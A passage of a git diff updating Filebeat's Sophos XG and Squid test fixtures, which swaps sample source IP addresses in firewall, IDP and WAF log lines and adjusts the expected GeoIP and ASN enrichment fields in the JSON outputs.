-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:56 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=53589 signature_msg=\"SERVER-WEBAPP DrayTek multiple products command injection attempt\" classification=\"Web Application Attack\" rule_priority=2 src_ip=77.61.185.101 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=59476 dst_port=80 platform=\"Linux,Mac,Other,Unix,Windows\" category=\"server-webapp\" target=\"Server\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:56 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=53589 signature_msg=\"SERVER-WEBAPP DrayTek multiple products command injection attempt\" classification=\"Web Application Attack\" rule_priority=2 src_ip=67.43.156.12 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=59476 dst_port=80 platform=\"Linux,Mac,Other,Unix,Windows\" category=\"server-webapp\" target=\"Server\"",
         "event.outcome": "success",
         "event.severity": "4",
         "event.timezone": "-02:00",
@@ -178,7 +184,7 @@
         "host.name": "some_other_host.local",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 1243,
+        "log.offset": 1242,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123457",
@@ -189,7 +195,7 @@
         ],
         "related.ip": [
             "172.16.68.20",
-            "77.61.185.101"
+            "67.43.156.12"
         ],
         "rule.category": "Web Application Attack",
         "rule.id": "53589",
@@ -212,14 +218,13 @@
         "sophos.xg.rule_priority": "2",
         "sophos.xg.src_country_code": "NLD",
         "sophos.xg.target": "Server",
-        "source.as.number": 1136,
-        "source.as.organization.name": "KPN B.V.",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "NL",
-        "source.geo.country_name": "Netherlands",
-        "source.geo.location.lat": 52.3824,
-        "source.geo.location.lon": 4.8995,
-        "source.ip": "77.61.185.101",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.port": 59476,
         "tags": [
             "forwarded",
@@ -253,7 +258,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 1857,
+        "log.offset": 1855,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "SFDemo-f64dd6be",
@@ -321,7 +326,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 2434,
+        "log.offset": 2432,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "SFDemo-f64dd6be",
diff --git a/x-pack/filebeat/module/sophos/xg/test/waf.log b/x-pack/filebeat/module/sophos/xg/test/waf.log
index 519a84ca2fb0..ed60311864f6 100644
--- a/x-pack/filebeat/module/sophos/xg/test/waf.log
+++ b/x-pack/filebeat/module/sophos/xg/test/waf.log
@@ -1,5 +1,5 @@
-<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79
-<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79
+<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=216.160.83.61 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=216.160.83.61 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79
+<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=216.160.83.61 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=216.160.83.61 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79
 <30>device="SFW" date=2020-05-19 time=17:20:29 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8989 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/ querystring= cookie="-" referer=- method=GET httpstatus=403 reason="Static URL Hardening" extra="No signature found" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=19310 bytessent=726 bytesrcv=510 fw_rule_id=3
 <30>device="SFW" date=2020-05-19 time=18:03:30 timezone="IST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8990 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/download/eicarcom2.zip querystring= cookie="; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*" referer=http://www.iviewtest.com:8990/85-0-Download.html method=GET httpstatus=403 reason="Antivirus" extra="EICAR-AV-Test" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=403214 bytessent=739 bytesrcv=715 fw_rule_id=6
-<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=83.97.20.30 localip=216.167.51.72 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=83.97.20.30 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3
+<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=89.160.20.112 localip=216.167.51.72 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=89.160.20.112 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3
diff --git a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json
index 6b8458c29a55..9ed26bd14d00 100644
--- a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json
@@ -2,18 +2,8 @@
     {
         "@timestamp": "2020-05-18T14:38:46.000-02:00",
         "client.bytes": 1419,
-        "client.ip": "89.68.140.204",
-        "destination.as.number": 199567,
-        "destination.as.organization.name": "Fr. Sauter AG",
+        "client.ip": "216.160.83.61",
         "destination.bytes": 401,
-        "destination.geo.city_name": "Saint-Prex",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "CH",
-        "destination.geo.country_name": "Switzerland",
-        "destination.geo.location.lat": 46.4796,
-        "destination.geo.location.lon": 6.4599,
-        "destination.geo.region_iso_code": "CH-VD",
-        "destination.geo.region_name": "Vaud",
         "destination.ip": "185.8.209.207",
         "event.action": "denied",
         "event.category": [
@@ -24,7 +14,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:46 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL\" referer=- method=POST httpstatus=401 reason=\"-\" extra=\"-\" contenttype=\"-\" useragent=\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)\" host=89.68.140.204 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:46 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=216.160.83.61 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL\" referer=- method=POST httpstatus=401 reason=\"-\" extra=\"-\" contenttype=\"-\" useragent=\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)\" host=216.160.83.61 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79",
         "event.severity": "6",
         "event.timezone": "-02:00",
         "event.type": [
@@ -47,7 +37,7 @@
         ],
         "related.ip": [
             "185.8.209.207",
-            "89.68.140.204"
+            "216.160.83.61"
         ],
         "server.bytes": 5669,
         "server.ip": "185.8.209.207",
@@ -56,7 +46,7 @@
         "sophos.xg.device": "SFW",
         "sophos.xg.device_name": "XG230",
         "sophos.xg.fw_rule_id": "79",
-        "sophos.xg.host": "89.68.140.204",
+        "sophos.xg.host": "216.160.83.61",
         "sophos.xg.log_component": "Web Application Firewall",
         "sophos.xg.log_type": "WAF",
         "sophos.xg.message_id": "17071",
@@ -64,18 +54,17 @@
         "sophos.xg.querystring": "?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com",
         "sophos.xg.responsetime": "11199",
         "sophos.xg.server": "webmail.elasticuser.com",
-        "source.as.number": 6830,
-        "source.as.organization.name": "Liberty Global B.V.",
+        "source.as.number": 209,
         "source.bytes": 1419,
-        "source.geo.city_name": "Gdynia",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "PL",
-        "source.geo.country_name": "Poland",
-        "source.geo.location.lat": 54.5055,
-        "source.geo.location.lon": 18.5403,
-        "source.geo.region_iso_code": "PL-22",
-        "source.geo.region_name": "Pomerania",
-        "source.ip": "89.68.140.204",
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "tags": [
             "forwarded",
             "sophos-xg"
@@ -88,18 +77,8 @@
     {
         "@timestamp": "2020-05-18T14:38:47.000-02:00",
         "client.bytes": 1774,
-        "client.ip": "89.68.140.204",
-        "destination.as.number": 199567,
-        "destination.as.organization.name": "Fr. Sauter AG",
+        "client.ip": "216.160.83.61",
         "destination.bytes": 200,
-        "destination.geo.city_name": "Saint-Prex",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "CH",
-        "destination.geo.country_name": "Switzerland",
-        "destination.geo.location.lat": 46.4796,
-        "destination.geo.location.lon": 6.4599,
-        "destination.geo.region_iso_code": "CH-VD",
-        "destination.geo.region_name": "Vaud",
         "destination.ip": "185.8.209.207",
         "event.action": "denied",
         "event.category": [
@@ -110,7 +89,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:47 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M\" referer=- method=POST httpstatus=200 reason=\"-\" extra=\"-\" contenttype=\"application/mapi-http\" useragent=\"Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)\" host=89.68.140.204 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:47 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=216.160.83.61 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M\" referer=- method=POST httpstatus=200 reason=\"-\" extra=\"-\" contenttype=\"application/mapi-http\" useragent=\"Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)\" host=216.160.83.61 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79",
         "event.severity": "6",
         "event.timezone": "-02:00",
         "event.type": [
@@ -133,7 +112,7 @@
         ],
         "related.ip": [
             "185.8.209.207",
-            "89.68.140.204"
+            "216.160.83.61"
         ],
         "server.bytes": 1357,
         "server.ip": "185.8.209.207",
@@ -143,7 +122,7 @@
         "sophos.xg.device": "SFW",
         "sophos.xg.device_name": "XG230",
         "sophos.xg.fw_rule_id": "79",
-        "sophos.xg.host": "89.68.140.204",
+        "sophos.xg.host": "216.160.83.61",
         "sophos.xg.log_component": "Web Application Firewall",
         "sophos.xg.log_type": "WAF",
         "sophos.xg.message_id": "17071",
@@ -151,18 +130,17 @@
         "sophos.xg.querystring": "?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com",
         "sophos.xg.responsetime": "14086",
         "sophos.xg.server": "webmail.elasticuser.com",
-        "source.as.number": 6830,
-        "source.as.organization.name": "Liberty Global B.V.",
+        "source.as.number": 209,
         "source.bytes": 1774,
-        "source.geo.city_name": "Gdynia",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "PL",
-        "source.geo.country_name": "Poland",
-        "source.geo.location.lat": 54.5055,
-        "source.geo.location.lon": 18.5403,
-        "source.geo.region_iso_code": "PL-22",
-        "source.geo.region_name": "Pomerania",
-        "source.ip": "89.68.140.204",
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "tags": [
             "forwarded",
             "sophos-xg"
@@ -323,15 +301,8 @@
     {
         "@timestamp": "2020-05-20T18:03:31.000-02:00",
         "client.bytes": 295,
-        "client.ip": "83.97.20.30",
-        "destination.as.number": 2914,
-        "destination.as.organization.name": "NTT America, Inc.",
+        "client.ip": "89.160.20.112",
         "destination.bytes": 403,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "216.167.51.72",
         "event.action": "denied",
         "event.category": [
@@ -342,7 +313,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-20 time=18:03:31 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=- sourceip=83.97.20.30 localip=216.167.51.72 ws_protocol=\"HTTP/1.0\" url=/ querystring=\"\" cookie=\"-\" referer=\"-\" method=GET httpstatus=403 reason=\"WAF Anomaly\" extra=\"Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header\" contenttype=\"text/html\" useragent=\"-\" host=83.97.20.30 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3",
+        "event.original": "device=\"SFW\" date=2020-05-20 time=18:03:31 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=- sourceip=89.160.20.112 localip=216.167.51.72 ws_protocol=\"HTTP/1.0\" url=/ querystring=\"\" cookie=\"-\" referer=\"-\" method=GET httpstatus=403 reason=\"WAF Anomaly\" extra=\"Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header\" contenttype=\"text/html\" useragent=\"-\" host=89.160.20.112 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3",
         "event.outcome": "success",
         "event.severity": "6",
         "event.timezone": "-02:00",
@@ -366,7 +337,7 @@
         ],
         "related.ip": [
             "216.167.51.72",
-            "83.97.20.30"
+            "89.160.20.112"
         ],
         "server.bytes": 5353,
         "server.ip": "216.167.51.72",
@@ -376,7 +347,7 @@
         "sophos.xg.device_name": "XG230",
         "sophos.xg.extra": "Inbound Anomaly Score Exceeded (Total Score: 7,",
         "sophos.xg.fw_rule_id": "3",
-        "sophos.xg.host": "83.97.20.30",
+        "sophos.xg.host": "89.160.20.112",
         "sophos.xg.log_component": "Web Application Firewall",
         "sophos.xg.log_type": "WAF",
         "sophos.xg.message_id": "17071",
@@ -385,18 +356,18 @@
         "sophos.xg.responsetime": "608",
         "sophos.xg.sqli": ",",
         "sophos.xg.xss": "): Last Matched Message: Request Missing a User Agent Header",
-        "source.as.number": 9009,
-        "source.as.organization.name": "M247 Ltd",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
         "source.bytes": 295,
-        "source.geo.city_name": "Bucharest",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RO",
-        "source.geo.country_name": "Romania",
-        "source.geo.location.lat": 44.4176,
-        "source.geo.location.lon": 26.1708,
-        "source.geo.region_iso_code": "RO-B",
-        "source.geo.region_name": "Bucuresti",
-        "source.ip": "83.97.20.30",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "tags": [
             "forwarded",
             "sophos-xg"
diff --git a/x-pack/filebeat/module/squid/log/test/access1.log-expected.json b/x-pack/filebeat/module/squid/log/test/access1.log-expected.json
index 6614defcea29..d7620e206487 100644
--- a/x-pack/filebeat/module/squid/log/test/access1.log-expected.json
+++ b/x-pack/filebeat/module/squid/log/test/access1.log-expected.json
@@ -1,13 +1,6 @@
 [
     {
         "@timestamp": "2006-09-08T04:21:52.000Z",
-        "destination.as.number": 36752,
-        "destination.as.organization.name": "Oath Holdings Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "209.73.177.115",
         "event.action": "TCP_MISS",
         "event.code": "CONNECT",
@@ -65,16 +58,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:00.000Z",
-        "destination.as.number": 30633,
-        "destination.as.organization.name": "Leaseweb USA, Inc.",
-        "destination.geo.city_name": "Falls Church",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.9307,
-        "destination.geo.location.lon": -77.1673,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "207.58.145.61",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -135,16 +118,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:00.000Z",
-        "destination.as.number": 30633,
-        "destination.as.organization.name": "Leaseweb USA, Inc.",
-        "destination.geo.city_name": "Falls Church",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.9307,
-        "destination.geo.location.lon": -77.1673,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "207.58.145.61",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -327,16 +300,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:03.000Z",
-        "destination.as.number": 30633,
-        "destination.as.organization.name": "Leaseweb USA, Inc.",
-        "destination.geo.city_name": "Falls Church",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.9307,
-        "destination.geo.location.lon": -77.1673,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "207.58.145.61",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -397,13 +360,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:04.000Z",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "66.102.9.147",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -467,16 +423,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:04.000Z",
-        "destination.as.number": 30633,
-        "destination.as.organization.name": "Leaseweb USA, Inc.",
-        "destination.geo.city_name": "Falls Church",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.9307,
-        "destination.geo.location.lon": -77.1673,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "207.58.145.61",
         "event.action": "TCP_REFRESH_HIT",
         "event.code": "GET",
@@ -539,16 +485,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:22:04.000Z",
-        "destination.as.number": 30633,
-        "destination.as.organization.name": "Leaseweb USA, Inc.",
-        "destination.geo.city_name": "Falls Church",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.9307,
-        "destination.geo.location.lon": -77.1673,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
